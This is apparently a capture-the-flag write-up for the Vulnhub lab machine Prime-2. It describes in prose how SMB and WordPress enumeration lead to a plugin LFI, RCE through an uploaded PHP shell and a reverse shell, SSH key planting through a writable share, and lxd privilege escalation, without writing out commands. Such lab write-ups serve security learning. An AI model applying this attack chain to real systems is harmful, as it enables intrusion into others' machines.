This is the write-up for the vulnhub machine Prime-2. This is created by the Suraj and if you also want to try this machine, you can download in from here.
In this box when you enumerate, you will find 5 open ports. SMB share with anonymous access with READ and WRITE permissions. Wordpress is running on the box. The wp plugin gracemedia-media-player version 1.0 is vulnerable to LFI using this and php script it is possible to get RCE. As we have write permission on SMB share, uploaded the ssh public key to get user access then used lxd for priv esc.
Let’s start with finding all open ports using nmap.
Now let’s enumerate the service versions on above ports.
First I use enum4linux to get share names, potential users etc.It shows “welcome” share.
I used smbmap to see all the permissions, and we have READ and WRITE permission on welcome share.
I logged in welcome share using smbclient and download files that I think interesting, and there is only a file “shell.sh” with below contents.
Time to enumerate the files and directories on port 80 using gobuster. It looks like Wordpress is running on the remote host.
I decided to use metasploit auxiliary scanner to enumerate the plugins and themes.
After waiting for some time, it shows a plugin “gracemedia-media-player version 1.0”, which is vulnerable to LFI. Exploit can be found here.
Using above exploit I can able to view /etc/passwd file.
If you remember, we have shell.php file in /upload folder of smb welcome share. Lets try to access that and if we can perform the RCE.
I used python reverse shell and got the shell from the box.
If you remember, we have a write permission in jarves home directory through SMB share. I created .ssh directory in smb share, then upload the id_rsa.pub from my Kali machine into the .ssh directory.
SSH as jarves.
The id command shows jarves is the part of lxd group, I used lxd to escalate the privilege to root. I already mentioned steps in the write-up of Hacksudo-3 machine. After all steps I am able to pawn root shell.
So this is it, nice box. Hope you like it.
Thanks! for reading.
